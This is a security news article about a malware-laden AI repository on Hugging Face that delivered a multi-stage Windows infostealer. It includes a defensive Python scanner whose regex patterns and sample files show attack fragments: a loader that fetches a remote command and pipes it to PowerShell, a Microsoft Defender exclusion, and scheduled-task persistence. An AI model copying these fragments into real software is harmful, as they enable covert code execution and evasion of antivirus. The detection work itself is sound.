A widely used artificial intelligence repository on the Hugging Face platform has been discovered to contain malware, particularly targeting Windows operating systems. This repository, known as ‘Open-OSS/privacy-filter,’ was downloaded over 200,000 times before its removal by the platform’s security team.
Deceptive Appearance of the Malicious Package
The suspicious package was cleverly disguised as a legitimate privacy filtering tool, borrowing its model card directly from OpenAI’s Privacy Filter project. This misleading appearance led thousands of developers and researchers to download it, believing it to be a trustworthy AI utility.
Researchers from Hidden Layer were the first to identify the malicious code embedded within the repository. Their in-depth analysis uncovered a complex, multi-stage attack chain designed to covertly steal sensitive data from Windows devices while remaining undetected.
Stealthy Execution and Widespread Impact
The malware operated silently, executing in the background without alerting users. It employed a loader file that mimicked a legitimate AI model tool, commencing its harmful activities once activated on a Windows machine.
Before the repository was taken down, it had reached the top trending position on Hugging Face, with an estimated 244 downloads and 77 likes in under an hour. These figures were likely manipulated to boost the repository’s visibility and lure more victims.
Detailed Analysis of the Attack Chain
The attack unfolded over six stages. Initially, users were instructed to clone the repository and execute a ‘start.bat’ file on Windows, or a ‘loader.py’ script on Linux or macOS. On Windows, the ‘loader.py’ script executed decoy code, leading to a function that disabled SSL verification, decoded a URL, and fetched a JSON document to extract a command for PowerShell.
Subsequently, PowerShell downloaded a batch file from a domain imitating a blockchain analytics service. This file performed several actions, including admin checks and payload downloads. It also added exclusions to Microsoft Defender and created a scheduled task for persistence, which deleted itself after execution to avoid detection.
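A static triage check a reviewer could run over a cloned repository before executing anything in it, added here as an example for this article (not HiddenLayer's tooling or the repository's own code). The pattern set is assumed from the stages described above, and the sample file contents are constructed stand-ins rather than the real repository's files.

```python
import re

# One pattern per stage the write-up describes; a clean model repository has no
# reason to carry any of them in its loader or setup scripts.
PATTERNS = {
    "ssl_verification_disabled": r"verify\s*=\s*False|_create_unverified_context|CERT_NONE",
    "decoded_url_or_command": r"b64decode|bytes\.fromhex|FromBase64String",
    "powershell_handoff": r"\bpowershell(\.exe)?\b",
    "admin_check": r"net\s+session|whoami\s+/groups",
    "defender_exclusion": r"Add-MpPreference\s+-Exclusion",
    "scheduled_task_created": r"schtasks(\.exe)?\s+/create",
    "scheduled_task_deleted": r"schtasks(\.exe)?\s+/delete",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in PATTERNS.items()}
LOADER_STAGES = {"ssl_verification_disabled", "decoded_url_or_command", "powershell_handoff"}
PERSISTENCE_STAGES = {"defender_exclusion", "scheduled_task_created", "scheduled_task_deleted"}

def scan_text(text):
    """Return the sorted names of every pattern found in one file's contents."""
    return sorted(name for name, rx in COMPILED.items() if rx.search(text))

def triage_repo(files):
    """Map each file (name -> contents) that trips a pattern to its matched names."""
    return {name: hits for name, text in files.items() if (hits := scan_text(text))}

def risk_level(findings):
    """'high' if loader-side and persistence-side stages both appear anywhere in the
    repository, 'medium' if only one side does, 'low' if nothing matched."""
    hits = {h for file_hits in findings.values() for h in file_hits}
    sides = bool(hits & LOADER_STAGES) + bool(hits & PERSISTENCE_STAGES)
    return ("low", "medium", "high")[sides]

# Constructed stand-in for a cloned repository, not the real repository's files.
# The two scripts hold only the tell-tale fragments, not a working chain.
SAMPLE_REPO = {
    "README.md": "# privacy-filter\nRedacts PII from text. Run loader.py to start.\n",
    "loader.py": (
        "import base64, requests, subprocess\n"
        "url = base64.b64decode(ENCODED_URL).decode()  # ENCODED_URL is a placeholder\n"
        "cmd = requests.get(url, verify=False).json()['cmd']\n"
        "subprocess.run(['powershell', '-Command', cmd])\n"
    ),
    "start.bat": (
        "net session >nul 2>&1 || echo not admin\n"
        "powershell Add-MpPreference -ExclusionPath %TEMP%\n"
        "schtasks /create /tn Updater /sc onlogon /tr %TEMP%\\run.bat\n"
        "schtasks /delete /tn Updater /f\n"
    ),
}
```

Calling `triage_repo(SAMPLE_REPO)` flags only the two scripts and leaves the model card untouched, and `risk_level` on those findings returns "high" because both the loader side and the persistence side of the chain are present.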
Final Payload and Security Recommendations
The final payload was a 10 MB Rust-based infostealer with capabilities to retrieve various types of sensitive information. It targeted browser cookies, saved passwords, SSH keys, VPN configurations, and more, sending the gathered data to a command-and-control server.
Hidden Layer’s telemetry linked the attacker to multiple similar repositories, indicating a broader supply chain attack on open-source AI platforms. Users who downloaded the affected repository are advised to isolate their systems, change stored credentials, and consider reimaging their machines before returning them to active use.
For comprehensive threat intelligence, review the Indicators of Compromise (IoCs) related to this incident. Follow security best practices to safeguard against future threats.
